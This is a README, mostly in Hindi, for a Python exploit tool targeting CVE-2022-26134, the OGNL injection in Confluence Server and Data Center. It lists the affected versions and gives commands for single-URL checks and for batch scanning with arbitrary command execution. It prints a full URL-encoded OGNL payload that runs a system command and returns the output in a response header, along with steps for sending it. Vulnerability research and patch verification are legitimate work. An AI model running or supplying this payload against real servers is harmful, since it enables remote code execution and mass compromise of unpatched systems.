
Python-आधारित एक्सप्लॉइट CVE-2022-26134 के लिए, जो Confluence Server और Data Center में एक OGNL इंजेक्शन भेद्यता है। एकल URL जांच और मनमाने कमांड निष्पादन के साथ बैच स्कैनिंग का समर्थन करता है।
CVE-2022-26134 - Confluence OGNL injection vulnerability
python लाइब्रेरी स्थापित करें
pip install -r requirements.txt
भेद्यता सत्यापन
python3 CVE-2022-26134_check.py -u url -c whoami

बैच स्कैनिंग
python3 CVE-2022-26134_check.py -f url.txt -c whoami

Confluence Server and Data Center >= 1.3.0
Confluence Server and Data Center < 7.4.17
Confluence Server and Data Center < 7.13.7
Confluence Server and Data Center < 7.14.3
Confluence Server and Data Center < 7.15.2
Confluence Server and Data Center < 7.16.4
Confluence Server and Data Center < 7.17.4
Confluence Server and Data Center < 7.18.1
payload:
/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Qualys-Response%22%2C%23a%29%29%7D/
Confluence सेवा तक पहुँचें, 302 रिटर्न कोड वाला डेटा पैकेट कैप्चर करें, payload वाला डेटा पैकेट भेजें; रिटर्न पैकेट में X-Qualys-Response पैरामीटर वर्तमान सर्वर का उपयोगकर्ता नाम लौटाएगा।

हमलावर द्वारा प्रदान किया गया URI namespace में परिवर्तित किया जाता है, फिर इस namespace को OGNL एक्सप्रेशन में परिवर्तित करके गणना की जाती है (हमलावर द्वारा प्रदान किया गया url अप्रत्यक्ष रूप से OGNL एक्सप्रेशन में परिवर्तित होकर गणना की जाती है)।